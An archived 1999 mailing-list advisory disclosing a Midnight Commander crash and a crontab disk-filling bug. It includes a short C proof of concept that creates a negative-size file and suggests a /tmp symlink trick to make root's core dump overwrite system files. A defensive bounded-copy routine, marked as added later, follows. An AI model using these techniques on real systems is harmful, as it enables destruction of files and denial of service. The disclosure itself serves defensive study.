Large size file and Midnight/bug in crontab with this file

From: Maurycy Prodeus (z33dat_private)
Date: Wed Apr 14 1999 - 23:16:08 PDT


    Hello ...
    *******************************************************************************
    *
    * I.  -= Midnight small buf =-
    *
    * II. -= Large size file - you can fill disk too with crontab ( Michal
    *   Zalewski found this )
    *
    *******************************************************************************
    
    I.
    
    This time I found another bug in Midnight Commander 4.xx [ I used 4.1.33 ;) ] ...
    We can cause a Segmentation Fault, and if root doesn't lock this, it causes
    core dumping ... of course we just make some file in /tmp (?) and if root
    reads this file ... his mc creates a core ... yeesss, we can make a symlink to
    every file in the system ... and this file will be totally destroyed!
    Together with "Social Engineering", it is dangerous. [ the filename may be, for example:
    hacker.tools or sth. ]
    What file must we create?
    One with negative size, but really it is a very large size ;-) ( very strange
     that even in kernel 2.2.5 it is possible )
    
    Quick test: Run this program, then run mc and try to read [ F3 of course,
    and for example PageDown ] the file which was created by mc-kill ...
    
    --------- mc-kill.c ------------
    
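    #include <sys/file.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #define size -900000   /* negative length requested from ftruncate() */
    
    int main(int argc,char* argv[]) {
      int i;
      if (!argv[1]) {
        printf("\nUSAGE : %s filename[and path] \n\n",argv[0]);
        exit(0);
      }
      /* create the file, then make it world-readable/writable */
      fchmod(i=open(argv[1],O_RDWR|O_CREAT,0600),0666);
      /* set the file length to the negative value described above */
      ftruncate(i,size);
      fsync(i);
      return 0;
    }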
    ------------ end of mc-kill.c ---------------
    
    SOLUTION
    
    You NEVER read strange files in MC ...:-)
    hmmm seriously: lcamtuf [ http://dione.ids.pl ] wrote a kernel module which
    does not allow creating symlinks in /tmp ...
    
    II.
    
    If you use the above program ( or /dev/zero :-) ) you may fill a partition ...
    When crontab is reading a file, it creates a temp file in /var/spool/cron/
    ( non-root can't even read this - lcamtuf ). But if it doesn't finish, then
    it doesn't delete this temp file ... OK. So, we must give crontab a file
    with "infinite" size.
    
    Example : crontab -file-made-by-mc-kill
    
    
    SOLUTION
    
    It isn't very dangerous.
    
    
    
    
    *******************************************************************************
    
    z33d email : z33dat_private www : z33d.lighting.ml.org
    
    If no rational optimal strategy exists, the optimal strategy
    is a random strategy ...
                                  - unknown -
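
A defensive counterpart to part II, added here as an example and not code from the post or from any crontab implementation: a copy routine that caps the input size and removes its own temp file when the copy does not finish. The name `bounded_copy` and the `MAX_INPUT` cap are assumptions for illustration.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_INPUT (256 * 1024)  /* assumed cap; not a value from the post */

/* Copy src to a new file dst, at most MAX_INPUT bytes. Returns 0 on success,
 * -1 on rejection or error; a dst created here is removed on failure. */
int bounded_copy(const char *src, const char *dst)
{
    char buf[4096];
    struct stat st;
    off_t total = 0;
    ssize_t n = 0;
    int in, out, rc = -1;
    if ((in = open(src, O_RDONLY)) < 0)
        return -1;
    /* Early rejection: regular files only (not /dev/zero), sane st_size. */
    if (fstat(in, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_size < 0 || st.st_size > MAX_INPUT) {
        close(in);
        return -1;
    }
    /* O_EXCL fails on an existing path or symlink instead of writing through it. */
    if ((out = open(dst, O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0) {
        close(in);
        return -1;
    }
    /* The file may grow after fstat(), so also count the bytes actually read. */
    while ((n = read(in, buf, sizeof buf)) > 0) {
        total += n;
        if (total > MAX_INPUT || write(out, buf, (size_t)n) != n)
            break;
    }
    if (n == 0)
        rc = 0;               /* clean EOF under the cap */
    close(in);
    if (close(out) < 0)
        rc = -1;
    if (rc != 0)
        unlink(dst);          /* never leave a partial temp file behind */
    return rc;
}

int main(int argc, char **argv)
{
    return (argc == 3 && bounded_copy(argv[1], argv[2]) == 0) ? 0 : 1;
}
```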
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:42:35 PDT